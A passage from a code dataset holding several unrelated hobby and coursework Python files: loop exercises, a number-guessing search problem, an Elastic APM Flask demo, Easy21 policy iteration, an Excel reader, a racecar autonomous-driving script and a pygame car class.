{}\n","sub_path":"xai/brain/wordbase/verbs/_sullied.py","file_name":"_sullied.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"562960220","text":"# if\nfrom datetime import datetime\nhour = datetime.now().hour\nif hour < 12:\n print('오전입니다')\nnumbers = [1,2,3,4,5]\nif 5 in numbers:\n print(\"5가 있다\")\n\n# while\ni, j, count = 1, 1, 5\nwhile i < count:\n while j <= i:\n print('*', end='')\n j += 1\n print()\n j = 1\n i += 1\n\n# for\nfor i in range(7):\n print(i)\nfor i in range(1,7,2):\n print(i) \nfor i in range(1,6):\n for j in range(i):\n print('*', end='')\n print()\nfor s in ['adc', 'de', 'fgh']:\n print(s)\np = ['가위', '바위', '보']\nfor i in p:\n print(i)\nstr = ['a', 'bc', 'def', 'ghij']\nfor i, s in enumerate(str):\n print('{}번 : {}'.format(i + 1, s))\nfor s2 in \"abcdefgh\":\n print(s2)\n\n# 예제 1\nn = int(input('숫자를 입력하세요 : '))\nfor i in range(1, n + 1):\n print('2 to the ' + str(i) + ' power is ' + str(2**i))\n\n# 과제 1\nn = int(input('숫자를 입력하세요 : '))\ni = 0\nwhile i < 10:\n print('2 to the ' + str(i) + ' power is ' + str(2**i))\n i += 1\n\n# 예제 2\nsentence = input('문자열 입력 : ')\ncount = 0\nfor c in sentence:\n if c in 'aeiou':\n count += 1\nprint('There are ' + str(count) + ' vowels in that sentence.')\n\n# 과제 2\nfor i in range(1, 10):\n for j in range(2, 10):\n print(\"{0:2d} * {1:2d} = {2:2d}\".format(j, i, i*j), end='')\n print()","sub_path":"Python/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"171360708","text":"import math\nimport time\n\ndef extract_mag_and_phase(vector):\n \"\"\"\n Return the phase and magnitude of the \n frame vector [dx,dy]\n \"\"\"\n vector = list(vector)\n scaling_factor = math.sqrt(vector[0]**2 + vector[1]**2)\n mag = math.sqrt(vector[0]**2+vector[1]**2)\n vector[0] = vector[0] * (1./scaling_factor)\n vector[1] = vector[1] * (1./scaling_factor)\n phase = degrees(math.copysign(math.atan(vector[1]/vector[0]), vector[1]) + math.pi)\n return [mag, phase]\n\ndef get_note(phase):\n \"\"\"\n Figure out what range the phase is in\n \"\"\"\n correct = 1\n\n #note_phases = {'G':[90,112],'C':[112,134],'E':[134,156],'A':[156,178],'D':[178,200]}\n note_phases = 
{0:[90,112],1:[112,134],2:[134,156],3:[156,178],4:[178,200]}\n#69 71 72 76 84\n for note, p_range in note_phases.iteritems():\n if phase%360 < p_range[1] and phase%360 >= p_range[0]:\n correct = note\n return correct\n\ndef degrees(phase):\n if phase<0:\n phase = 2*math.pi+phase\n return phase/math.pi*180\n\ndef get_volume(mag,threshold,c):\n \"\"\"\n Some constant times the magnitude = volume \n unless magnitude is below a threshold\n \"\"\"\n if mag > threshold:\n return c*mag\n else:\n return 0\n\ndef note_delay(prev_time, prev_note, cur_note, tmax=1):\n \"\"\"\n If the note for this frame is the same as the last, \n don't do anything until tmax seconds have passed\n or another note is played\n \"\"\"\n while prev_note == cur_note:\n time_delta = time.time() - prev_time ## old time being the last time that note was played\n if time_delta >= tmax: #seconds\n ## play the note again\n prev_time = time.time()\n prev_note = cur_note\n else:\n ## be silent\n pass\n","sub_path":"map_cvdata.py","file_name":"map_cvdata.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491927816","text":"'''heyingge_Find_the_Number.py\nby Freddie He\n\nAssignment 2, in CSE 415, Winter 2018.\n\nThis file contains my problem formulation for the problem of\nfinding the secret number.\n'''\n\n# \nPROBLEM_NAME = \"Find_the_Number\"\nPROBLEM_VERSION = \"1.0\"\n# \n\n# \nGUESS_NUM = 0 # Use default, but override if new value supplied\nMAX_NUMBER = 100\n# by the user on the command line.\ntry:\n import sys\n\n arg2 = sys.argv[2] # takes the 2nd argument to be the secret number\n GUESS_NUM = int(arg2)\n arg3 = sys.argv[3] # takes the 2nd argument to be the range\n MAX_NUMBER = int(arg3)\n print(\"A new secret number was successfully read in from the command\"\n \" line. 
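The magnitude/phase extraction in map_cvdata.py above normalises the vector, then combines copysign with atan and shifts by pi. math.atan2 is the standard way to get a full-circle angle in one call: it also handles dx == 0, where the atan version divides by zero, and note that because the original adds pi its note bins are rotated 180 degrees relative to this sketch:

import math

def mag_and_phase(dx, dy):
    mag = math.hypot(dx, dy)                          # sqrt(dx**2 + dy**2)
    phase = math.degrees(math.atan2(dy, dx)) % 360.0  # angle in [0, 360)
    return mag, phase

print(mag_and_phase(1.0, 1.0))   # (1.414..., 45.0)
print(mag_and_phase(-1.0, 0.0))  # (1.0, 180.0)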
A new maximum number (range limit) was successfully\"\n \" read in from the command line.\")\nexcept:\n print(\"Using default secret number: \" + str(GUESS_NUM)\n + \"and default range\" + str(MAX_NUMBER))\n print(\" (To use a specific number, enter it on the command line, e.g.,\")\n print(\"python3 ../Int_Solv_Client.py heyingge_Find_the_Number 3 10)\")\n\n\n# \n\n# \nclass State:\n def __init__(self, d):\n self.d = d\n\n def __eq__(self, s2):\n if len(self.d) != len(s2.d):\n return false\n for p in (0, len(self.d)):\n if self.d[p] != s2.d[p]: return False\n return True\n\n def __str__(self):\n # Produces a textual description of a state.\n # Might not be needed in normal operation with GUIs.\n return \"question_phase: \" + str(self.d['phase']) + \\\n \"\\nlast_m: \" + str(self.d['last_m']) + \\\n \"\\npossibilities: \" + str(self.d['possibilities'])\n\n def __hash__(self):\n return (self.__str__()).__hash__()\n\n def copy(self):\n # Performs an appropriately deep copy of a state,\n # for use by operators in creating new states.\n news = State({})\n news.d['possibilities'] = self.d['possibilities'][:]\n news.d['phase'] = self.d['phase']\n news.d['last_m'] = self.d['last_m']\n return news\n\n def can_move(self, p, phase):\n '''Tests whether it's legal to do the calculation of (n - k) % m.'''\n try:\n if self.d['phase'] == 0:\n # the value of m must be a prime smaller than the max number\n return isPrimeUnderMax(p, MAX_NUMBER) and phase == 0\n else:\n # the value of k must be smaller than m and greater than 0\n return 0 <= p < self.d['last_m'] and phase == 1\n except Exception as e:\n print(e)\n\n def move(self, k):\n '''Assuming it's legal to make the move, this computes\n the new state resulting from (k, m) which is chosen by user.'''\n news = self.copy() # start with a deep copy.\n if self.d['phase'] == 1:\n m = self.d['last_m']\n if (GUESS_NUM - k) % m == 0:\n for p in self.d['possibilities'][:]:\n if (p - k) % m != 0:\n news.d['possibilities'].remove(p)\n else:\n for p in self.d['possibilities'][:]:\n if (p - k) % m == 0:\n news.d['possibilities'].remove(p)\n news.d['phase'] = 0 # set phase to 0\n else:\n news.d['last_m'] = k # update last_m\n news.d['phase'] = 1 # set phase to 1\n return news # return new state\n\n\ndef goal_test(s):\n '''If there is only one possible answer left, then s is a goal state.'''\n return len(s.d['possibilities']) == 1 and \\\n s.d['possibilities'][0] == GUESS_NUM\n\n\ndef goal_message(s):\n return \"You figure out the secret number!\"\n\n\nclass Operator:\n def __init__(self, name, precond, state_transf):\n self.name = name\n self.precond = precond\n self.state_transf = state_transf\n\n def is_applicable(self, s):\n return self.precond(s)\n\n def apply(self, s):\n return self.state_transf(s)\n\n\n# \n\n# \nINITIAL_DICT = {'possibilities': list(range(MAX_NUMBER + 1)),\n 'phase': 0, 'last_m': None}\nCREATE_INITIAL_STATE = lambda: State(INITIAL_DICT)\n# \n\n# \npossibilities = list(range(MAX_NUMBER + 1))\nOPERATORS = [Operator(\"Is N divisible by \" + str(p) + \" after ...\",\n lambda s, p1=p: s.can_move(p1, 0),\n # The default value construct is needed\n # here to capture the value of p separately\n # in each iteration of the list comp. iteration.\n lambda s, p1=p: s.move(p1))\n for p in possibilities[:]] + \\\n [Operator(\"... subtracting \" + str(p) + \" ?\",\n lambda s, p1=p: s.can_move(p1, 1),\n # The default value construct is needed\n # here to capture the value of p separately\n # in each iteration of the list comp. 
iteration.\n lambda s, p1=p: s.move(p1))\n for p in possibilities[:]]\n# \n\n# (optional)\nGOAL_TEST = lambda s: goal_test(s)\n# \n\n# (optional)\nGOAL_MESSAGE_FUNCTION = lambda s: goal_message(s)\n\n\n# \n\n# this function returns whether m is a prime number within [0, max]\ndef isPrimeUnderMax(m, max):\n if m < 2 or m > max:\n return False\n for i in range(2, m):\n if m % i == 0:\n return False\n return True\n","sub_path":"a2-starter-code/Find_the_Number/heyingge_Find_the_Number.py","file_name":"heyingge_Find_the_Number.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"158262120","text":"from flask import Flask\nfrom elasticapm.contrib.flask import ElasticAPM\nimport os\nfrom flask import Flask\nfrom elasticapm.contrib.flask import ElasticAPM\n\nflask_app = Flask(__name__)\nflask_app.config['ELASTIC_APM'] = {\n 'SERVICE_NAME': 'Incredible_APM',\n 'SECRET_TOKEN': os.getenv('SECRET_TOKEN'),\n 'SERVER_URL': os.getenv('SERVER_URL'),\n}\napm_client = ElasticAPM(flask_app,logging=True)\n\n@flask_app.route(\"/\")\ndef foo():\n try:\n 1 / 0\n except ZeroDivisionError:\n apm_client.capture_exception()\n\n# Note : that errors and transactions will only be sent to the APM Server if your app is NOT in debug mode!\nif __name__ == \"__main__\":\n flask_app.run(debug=False,port=6060)","sub_path":"elastic-apm/apm-flask-client.py","file_name":"apm-flask-client.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104945883","text":"from env import Game\nfrom env import Visualizer\nimport copy\nimport numpy as np\nfrom collections import defaultdict\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nepisode_num = 100\ntheta = 0.15\n\nValue_table=np.zeros((10, 21)) # 创建并初始化价值矩阵\nPolicy=np.zeros((10, 21)) # 创建策略矩阵\nprob = 0.1\nred_prob = 1/3 * prob\nblack_prob = 2/3 * prob\n\ndef initial_policy(): #初始化策略矩阵\n for i in range(10):\n for j in range(21):\n Policy[i,j]=np.random.randint(0, 2)\n\ndef update_value_for_one_state(env, action, dealer, player, v_table):\n v = 0\n if action==0:\n for i in range(10): # 如果下一张牌抽到红牌i\n env.set(dealer, player)\n reward = env.hit_value(-i)\n if reward != -1:\n v += red_prob*(reward + v_table[dealer-1,player-i-1])\n else:\n v += red_prob * reward\n\n for j in range(10): #如果下一张牌抽到黑牌j\n env.set(dealer, player)\n reward = env.hit_value(j)\n if reward != -1:\n v += black_prob * (reward + v_table[dealer - 1, player + j - 1])\n else:\n # v += black_prob * (player-11 ) *reward\n v += black_prob * reward\n\n if action == 1:\n for k in range(500): #模拟500次dealer的状态然后取reward的平均值\n env.set(dealer,player)\n _, reward = env.step(action)\n v += reward\n v = v/500\n return v\n\ndef policy_evaluation(env,Value_table):\n while (True):\n delta = 0\n newValue = copy.deepcopy(Value_table)\n for dealer in range(1,11):\n for player in range(1,22): # 对所有状态遍历\n action = Policy[dealer-1, player-1] # 当前状态对应的策略\n newValue[dealer - 1, player - 1]=update_value_for_one_state(env,action, dealer, player, Value_table )\n delta = max(delta, abs(Value_table[dealer - 1, player - 1] - newValue[dealer - 1, player - 1]))\n Value_table = copy.deepcopy(newValue)\n if (delta < theta):\n return delta, Value_table # 收敛了就退出循环\n\ndef policy_improvement(env,dealer, player, Value_table):\n hit = 
update_value_for_one_state(env,0,dealer, player, Value_table)\n    stick = update_value_for_one_state(env,1,dealer, player, Value_table)\n    # pick whichever action has the higher value\n    if (hit>stick):\n        Policy[dealer - 1, player - 1] = 0\n    else:\n        Policy[dealer - 1, player - 1] = 1\n\nif __name__ == \"__main__\":\n    env = Game()\n    initial_policy()\n    result = []\n    for epi in range(episode_num):\n        # policy evaluation\n        pe,Value_table = policy_evaluation(env, Value_table)\n        print(pe, epi)\n        # policy improvement\n        policy_stable = True # if no state's policy was updated, stop early\n        for dealer in range(1, 11):\n            for player in range(1, 22):\n                old_action = Policy[dealer - 1, player - 1]\n                policy_improvement(env, dealer, player, Value_table)\n                if (old_action != Policy[dealer - 1, player - 1]): policy_stable=False\n        # print(Policy)\n        if(policy_stable):\n            break\n\n        # compute the win probability\n        win = 0\n        draw = 0 # draws\n        win_rate = 0\n\n        for i in range(200000):\n            env.reset()\n            while (True):\n                d, p = env.get_state()\n                action = Policy[d - 1, p - 1]\n                next, reward = env.step(action)\n\n                if (next == 'terminal'):\n                    if (reward > 0): win += 1\n                    if (reward == 0): draw += 1\n                    win_rate = win/200000\n                    break\n        print(epi, win, draw, win_rate)\n        result.append(win_rate)\n\n        f = open('result', 'a') # open the result file; it is created if it does not exist\n        f.write(str(epi)+'\\t'+ str(win)+'\\t'+str(draw)+'\\t'+str(win_rate)+'\\n')\n        f.close()\n\n\n    # plot the learning curve\n    epi = [i+1 for i in range(episode_num)]\n    plt.plot(epi, result)\n    plt.xlabel(\"episode\") # x-axis label\n    plt.ylabel(\"win rate\")\n    plt.title(\"learning curve\")\n    plt.show()\n    # plot the value table\n    V_dic = defaultdict(int)\n    for i in range(1, 22):\n        for j in range(1, 11):\n            state = (j, i)\n            V_dic[state, 0] = Value_table[j - 1, i - 1]\n            V_dic[state, 1] = -1000\n    Visualizer.visualize(V_dic, 'V-value')\n    # plot the policy\n    Visualizer.draw2d_array(Policy.transpose(), 'Optimal Policy [hit = 0, stick = 1]', True)\n\n\n","sub_path":"1-Easy21/Policy-iteration/run_policy_iteration.py","file_name":"run_policy_iteration.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98072623","text":"# Author: Silvia Ferman Muñoz\n# Program that reads the sides of a triangle\n# Top-down technique\n\n\n# Check what type of triangle it is\ndef checarTipoTriangulo(A, B, C):\n    if (A == B) and (B == C):\n        return \"Es un Triángulo Equilatero\"\n    if (A == B) or (B == C) or (A == C):\n        return \"Es un Triangulo Isóceles\"\n    if (A*A == B*B + C*C) or (B*B == A*A + C*C) or (C*C == A*A + B*B):\n        return \"Es un Triangulo Rectángulo\"\n    else:\n        return \"Estos lados no corresponden a un triángulo\"\n\n\n# Main function\ndef main():\n    A = int(input(\"El lado A vale: \"))\n    B = int(input(\"El lado B vale: \"))\n    C = int(input(\"El lado C vale: \"))\n\n    print(checarTipoTriangulo(A, B, C))\n\n\n# Call the main function\nmain()","sub_path":"Triangulos.py","file_name":"Triangulos.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"650865874","text":"\"\"\"\nCopyright MIT and Harvey Mudd College\nMIT License\nSummer 2020\n\nGrand Prix 2021\n\"\"\"\n\n########################################################################################\n# Imports\n########################################################################################\n\n#from labs.lab4.lab4b import DRIVE_SPEED, LEFT_WINDOW\n#from labs.lab4.lab4b import FRONT_WINDOW\nimport sys\nimport cv2 as cv\nimport numpy as np\nsys.path.insert(0, \"../../library\")\n\nimport racecar_core\nimport racecar_utils as rc_utils\nfrom 
racecar_utils import ARMarker\nfrom enum import IntEnum\n\n\n########################################################################################\n# Global variables\n########################################################################################\n\nrc = racecar_core.create_racecar()\n\n### LINE FOLLOWING ###\nBLUE_CONE = ((100,150,150), (120,255,255),\"BLUE\") \nRED_CONE = ((170, 150, 150), (10, 255, 255), \"RED\")\nBLUE = ((88, 245, 199), (108, 255, 255), \"BLUE\")\nRED = ((0, 50, 50), (20, 255, 255), \"RED\")\nORANGE = ((7, 172, 78), (27, 192, 158), \"ORANGE\")\nGREEN = ((40, 60, 60), (90, 255, 255), \"GREEN\") \nWHITE = ((90, 20, 200), (115, 60, 255), \"WHITE\")\nORANGEMARKER = ((7, 172, 78), (27, 192, 158), \"ORANGE\")#\nORANGELINE = ((5, 245, 215), (25, 255, 255), \"ORANGE\")\nPURPLEMARKER = ((121, 192, 109), (141, 212, 189), \"PURPLE\")#\nPURPLELINE = ((125, 245, 215), (145, 255, 255), \"PURPLE\")\n\n\n### LIDAR WINDOW ###\nFRONT_WINDOW = (-10, 10)\nRIGHT_FRONT_WINDOW = (40, 50)\nLEFT_FRONT_WINDOW = (310, 320)\n\nLEFT_WINDOW_LIDAR = (-135, -45)\nRIGHT_WINDOW_LIDAR = (45, 135)\nFRONT_WINDOW_LIDAR = (-10, 10)\nBACK_WINDOW_LIDAR = (170, 190)\n\n\n### CROPPED IMAGE ###\nCROP_FLOOR = ((360, 0), (rc.camera.get_height(), rc.camera.get_width()))\n\n\nMIN_CONTOUR_AREA = 30\n\npotential_colors = [BLUE, RED, GREEN]\npotential_colors_markers = [PURPLEMARKER, ORANGEMARKER]\npotential_colors_lines = [PURPLELINE, ORANGELINE]\n\nspeed = 0\nangle = 0\n\nwall_follow_end = False\nfinal_jump_end = False\nelevator_end = False\ncanyon_end = False\n\nrightLine = 0\n\ntime = 0.0\n# Camera values.\ncontour_center = None\ncontour_area = 0\n\ncur_color = None\ncontour_distance = 0.0\n\ncone_counter = 0\nprev_color = None\n\nMIN_CONTOUR_AREA = 650\n\ncurrentColor = None\n\ncounter = 0\n\nfinalJump = False\n\narColor = None\n########################################################################################\n# Functions\n########################################################################################\n\n### State Machine ###\nclass State(IntEnum):\n greenLine = 0\n wallFollow = 1\n purpleLine = 2\n elevator = 3\n cone = 4\n train = 5\n orangePlate = 6\n jump = 7\n\ncurState = State.greenLine\n\n### Initialization ###\ndef start():\n \"\"\"\n This function is run once every time the start button is pressed\n \"\"\"\n # Have the car begin at a stop\n rc.drive.stop()\n\n### State Update ###\ndef update():\n global curState, arColorGlobal\n \"\"\"\n After start() is run, this function is run every frame until the back button\n is pressed\n \"\"\"\n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n markers = rc_utils.get_ar_markers(color_image)\n ar_marker: ARMarker = None\n \n\n #Check to see if there are any markers detected and grab the closest marker.\n if len(markers) > 0:\n ar_marker = markers[0]\n ar_marker.detect_colors(color_image, potential_colors_markers)\n arColor = ar_marker.get_color()\n arColorGlobal = arColor\n \n\n #Gets the car distance from marker.\n if ar_marker is not None:\n corners = ar_marker.get_corners()\n centerX = (corners[0][0] + corners[3][0]) //2\n centerY= (corners[0][1] + corners[3][1]) //2 \n marker_distance = depth_image[centerX][centerY]\n #rc_utils.draw_circle(image, center, rc_utils.ColorBGR.yellow.value)\n else: \n marker_distance = None\n\n print(marker_distance)\n \n print(curState)\n if curState == State.greenLine:\n followLine()\n elif curState == State.wallFollow:\n print(\"wallfollowenter\")\n 
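# wallFollow() steers between the walls using the lidar windows defined above; it raises the module-level wall_follow_end flag once the green line reappears, and update() then switches curState back to State.greenLine.\n        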
wallFollow()\n if wall_follow_end is True:\n curState = State.greenLine\n elif curState == State.elevator:\n parkInElevator()\n if elevator_end is True:\n curState = State.greenLine\n # elif curState == State.jump:\n # finalStageLineFollowing()\n # if final_jump_end is True:\n # curState = State.greenLine\n\n\n if ar_marker is not None and marker_distance != 0.0: \n if marker_distance < 70:\n if ar_marker.get_id() == 0:\n curState = State.wallFollow\n elif ar_marker.get_id() == 1:\n curState = State.purpleLine\n elif ar_marker.get_id() == 4:\n curState = State.cone\n elif ar_marker.get_id() == 5:\n curState = State.train\n elif ar_marker.get_id() == 6:\n curState = State.orangePlate\n elif ar_marker.get_id() == 8:\n curState = State.jump\n if ar_marker.get_id() == 3:\n curState = State.elevator\n \n rc.drive.set_speed_angle(speed, angle)\n\ndef update_contour(color):\n \"\"\"\n Finds contours in the current color image and uses them to update contour_center\n and contour_area\n \"\"\"\n global contour_center\n global contour_area\n\n image = rc.camera.get_color_image()\n\n if image is None:\n contour_center = None\n contour_area = 0\n else:\n image = rc_utils.crop(image, CROP_FLOOR[0], CROP_FLOOR[1])\n\n contours = rc_utils.find_contours(image, color[0], color[1])\n contour = rc_utils.get_largest_contour(contours, MIN_CONTOUR_AREA)\n\n if contour is not None:\n contour_center = rc_utils.get_contour_center(contour)\n contour_area = rc_utils.get_contour_area(contour)\n rc_utils.draw_contour(image, contour)\n rc_utils.draw_circle(image, contour_center)\n else:\n contour_center = None\n contour_area = 0\n\n### Follows green line - Default state ###\ndef followLine():\n global speed\n global angle\n\n update_contour(GREEN)\n imgX = rc.camera.get_width()\n\n if contour_center is not None:\n angle = rc_utils.remap_range(contour_center[1],0,imgX,-1,1)\n\n speed = 2\n\n### Wall Follow ###\ndef wallFollow():\n global speed\n global angle\n global wall_follow_end\n global contour_center\n\n update_contour(GREEN)\n \n scan = rc.lidar.get_samples()\n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n rf_angle, rf_dist = rc_utils.get_lidar_closest_point(scan, RIGHT_FRONT_WINDOW)\n lf_angle, lf_dist = rc_utils.get_lidar_closest_point(scan, LEFT_FRONT_WINDOW)\n front_angle, front_dist = rc_utils.get_lidar_closest_point(scan, FRONT_WINDOW)\n\n markers = rc_utils.get_ar_markers(color_image)\n ar_marker: ARMarker = None\n \n #Check to see if there are any markers detected and grab the closest marker.\n if len(markers) > 0:\n ar_marker = markers[0]\n\n if front_dist < 170:\n if rf_dist > lf_dist:\n dif_dist_r = rc_utils.clamp(rf_dist - lf_dist, 0, 50)\n angle = rc_utils.remap_range(dif_dist_r, 0, 50, 0, 1)\n elif lf_dist > rf_dist:\n dif_dist_l = rc_utils.clamp(lf_dist - rf_dist, 0, 50)\n angle = rc_utils.remap_range(dif_dist_l, 0, 50, 0, -1)\n\n if contour_center is not None and ar_marker is None:\n print(\"end\")\n angle = 0\n wall_follow_end = True\n else:\n angle = 0\n\n speed = 1.5\n\n### Elevator Parking ###\ndef parkInElevator():\n\n global speed, angle, curState, elevator_end\n\n blue = ((90, 100, 100), (120, 255, 255), \"blue\")\n red = ((170, 100, 100), (10, 255, 255), \"red\")\n orange = ((7, 172, 78), (27, 192, 158), \"orange\")\n potential_colors = [blue, red, orange]\n \n color_image = rc.camera.get_color_image()\n depth_image = rc.camera.get_depth_image()\n\n markers = rc_utils.get_ar_markers(color_image)\n\n angle = 0\n if len(markers) > 0:\n \n marker = 
markers[0]\n\n        corners = marker.get_corners()\n        centerX = (corners[0][0] + corners[3][0]) //2\n        centerY = (corners[0][1] + corners[3][1]) //2 \n        \n        angle = rc_utils.remap_range(centerY, 0, rc.camera.get_width(), -1, 1) \n        angle = rc_utils.clamp(angle, -1, 1)\n\n        marker_distance = depth_image[centerX][centerY]\n\n        marker.detect_colors(color_image, potential_colors)\n        print(marker.get_color())\n        if marker_distance > 155 or marker.get_color() == \"blue\":\n            speed = 1\n        elif marker.get_color() == \"orange\":\n            speed = 0.4\n        elif marker.get_color() == \"red\":\n            speed = 0\n        \n    else:\n        elevator_end = True\n\n\n######################################################################################################################################\n\n# def finalStageLineFollowing():\n#     global speed\n#     global angle\n#     global rightLine\n#     global image, finalJump, counter\n#     global contour_center\n#     # global final_jump_end\n#     #print(order)\n\n#     update_contour(GREEN)\n#     image = rc.camera.get_color_image()\n#     print(\"RIGHT LINE: \", rightLine)\n#     image = rc_utils.crop(image, (0, 3 * rc.camera.get_width() // 4), (rc.camera.get_height(), rc.camera.get_width()))\n\n#     markers = rc_utils.get_ar_markers(image)\n#     ar_marker: ARMarker = None\n    \n#     #Check to see if there are any markers detected and grab the closest marker.\n#     if len(markers) > 0:\n#         ar_marker = markers[0]\n\n#     # rc.display.show_color_image(image)\n\n#     scan = rc.lidar.get_samples()\n#     _, left_dist = rc_utils.get_lidar_closest_point(scan, LEFT_WINDOW_LIDAR)\n#     _, right_dist = rc_utils.get_lidar_closest_point(scan, RIGHT_WINDOW_LIDAR)\n#     _, front_dist = rc_utils.get_lidar_closest_point(scan, FRONT_WINDOW_LIDAR)\n#     _, back_dist = rc_utils.get_lidar_closest_point(scan, BACK_WINDOW_LIDAR)\n\n#     update_contour_alt([BLUE], image)\n\n#     imgWidth = rc.camera.get_width()\n#     halfImgWidth = imgWidth // 2\n\n#     quarterImgWidth = rc.camera.get_width() // 4\n#     print(f\"Front: {front_dist} Back: {back_dist}\")\n\n#     if counter > 18 and ((front_dist < 170 and back_dist > 145) or finalJump == True):\n#         print(\"final ramp\")\n#         speed = 3\n#         angle = 0\n#         finalJump = True\n#     if finalJump == False:\n#         counter += rc.get_delta_time()\n#         print(\"Counter: \", counter)\n#     if contour_center is not None:\n#         print(\"Current Color: \", currentColor)\n\n#         centerClamped = rc_utils.clamp(contour_center[1], int(0.75 * quarterImgWidth), quarterImgWidth)\n#         angle = rc_utils.remap_range(centerClamped, int(0.75 * quarterImgWidth), quarterImgWidth, -1, 1)\n#         print(\"Angle: \", angle)\n#         speed = 1\n\n#     if contour_center is None:\n#         angle = 0.3\n#         speed = 1.0\n\n#     if contour_center is not None and ar_marker is None:\n#         final_jump_end = True\n########################################################################################\n# DO NOT MODIFY: Register start and update and begin execution\n########################################################################################\n\nif __name__ == \"__main__\":\n    rc.set_start_update(start, update, None)\n    rc.go()\n","sub_path":"labs/final/grand_prix_test.py","file_name":"grand_prix_test.py","file_ext":"py","file_size_in_byte":11469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"520952967","text":"# -*- coding: utf-8 -*-\nimport xlrd, xlwt\nfrom datetime import date, datetime\n\ndef read_excel():\n    # open the workbook file\n    workbook = xlrd.open_workbook(r'E:\\workspace\\pythonmakeauto\\pythonmakeauto\\人员信息.xlsx')\n    # list all sheet names\n    print(workbook.sheet_names())\n    sheet2_name = workbook.sheet_names()[1]\n    # 
get a sheet by index or by name\n    sheet2 = workbook.sheet_by_index(1) # sheet indices start at 0\n    sheet2 = workbook.sheet_by_name('Sheet2')\n\n    # sheet name, number of rows, number of columns\n    print(sheet2.name, sheet2.nrows, sheet2.ncols)\n\n\n\n\n\n    # get the values of a whole row and a whole column (as lists)\n    rows = sheet2.row_values(3) # contents of the fourth row\n    cols = sheet2.col_values(2) # contents of the third column\n\n\n    if (sheet2.cell(2,2).ctype == 3):\n        date_value = xlrd.xldate_as_tuple(sheet2.cell_value(2, 2), workbook.datemode)\n        date_tmp = date(*date_value[:3]).strftime('%Y/%m/%d')\n        print(rows)\n        print(date_tmp)\n\n    # get the content of a cell\n    print(sheet2.cell(1,0).value)\n    print(sheet2.cell_value(1,0))\n    print(sheet2.row(1)[0].value)\n\n    # data type of a cell's content: 0 empty, 1 string, 2 number, 3 date, 4 boolean, 5 error\n    print(sheet2.cell(1,0).ctype)\n\nif __name__ == '__main__':\n    read_excel()\n","sub_path":"excelPratise.py","file_name":"excelPratise.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640118816","text":"import pygame\r\nimport time\r\nfrom .env import *\r\nimport random\r\n\r\nclass Car(pygame.sprite.Sprite):\r\n    def __init__(self, y,distance):\r\n        pygame.sprite.Sprite.__init__(self)\r\n        self.image = pygame.Surface(car_size)\r\n        self.rect = self.image.get_rect()\r\n        self.rect.left,self.rect.top = distance, y\r\n        self.status = True\r\n        self.velocity = 0\r\n        self.distance = distance\r\n        self.car_no = 0\r\n        self.car_info = {}\r\n        self.coin_num = 0\r\n        self.max_vel = random.randint(10, 16)\r\n\r\n    def speedUp(self):\r\n        self.velocity += 0.01*(self.velocity**0.6)+0.04\r\n\r\n    def brakeDown(self):\r\n        self.velocity -= 0.2\r\n\r\n    def slowDown(self):\r\n        if self.velocity > 1:\r\n            self.velocity -= 0.05\r\n        elif 0 <= self.velocity < 0.9:\r\n            self.velocity += 0.3\r\n    def moveRight(self):\r\n        self.rect.centery += 3\r\n\r\n    def moveLeft(self):\r\n        self.rect.centery -= 3\r\n\r\n    def keep_in_screen(self):\r\n        if self.rect.left < -250 or self.rect.right > 1300 or self.rect.top < 100:\r\n            self.kill()\r\n\r\n    def get_info(self):\r\n\r\n        self.car_info = {\"id\": self.car_no,\r\n                         \"pos\": (self.rect.left, self.rect.top),\r\n                         \"distance\": self.distance,\r\n                         \"velocity\": self.velocity,\r\n                         \"coin_num\": self.coin_num}\r\n        return self.car_info\r\n\r\nclass UserCar(Car):\r\n    def __init__(self, y,distance,user_no):\r\n        Car.__init__(self, y,distance)\r\n        self.car_no = user_no\r\n        self.image_list = [pygame.transform.scale(pygame.image.load(\r\n            path.join(IMAGE_DIR, USER_IMAGE[self.car_no][0])), car_size), pygame.transform.scale(pygame.image.load(\r\n            path.join(IMAGE_DIR, USER_IMAGE[self.car_no][1])), car_size)]\r\n\r\n        self.image = self.image_list[0]\r\n        self.image = self.image.convert_alpha()\r\n        self.lastUpdateTime = time.time()\r\n        self.coin_num = 0\r\n        self.max_vel = 15\r\n\r\n    def update(self, control_list):\r\n        if self.status:\r\n            self.handleKeyEvent(control_list)\r\n            self.distance += self.velocity\r\n            self.keep_in_screen()\r\n        else:\r\n            pass\r\n\r\n\r\n    def keep_in_screen(self):\r\n        if self.rect.top < 100 or self.rect.bottom > 550:\r\n            self.status = False\r\n        if self.velocity > self.max_vel:\r\n            self.velocity = self.max_vel\r\n        elif self.velocity < 0:\r\n            self.velocity = 0\r\n\r\n    def handleKeyEvent(self, control_list: list):\r\n        if control_list is None:\r\n            return True\r\n        if LEFT_cmd in control_list:\r\n            self.moveLeft()\r\n            self.max_vel = 14.5\r\n\r\n        if RIGHT_cmd in control_list:\r\n            self.moveRight()\r\n            self.max_vel = 14.5\r\n        if LEFT_cmd not in control_list and RIGHT_cmd not in control_list:\r\n            self.max_vel = 
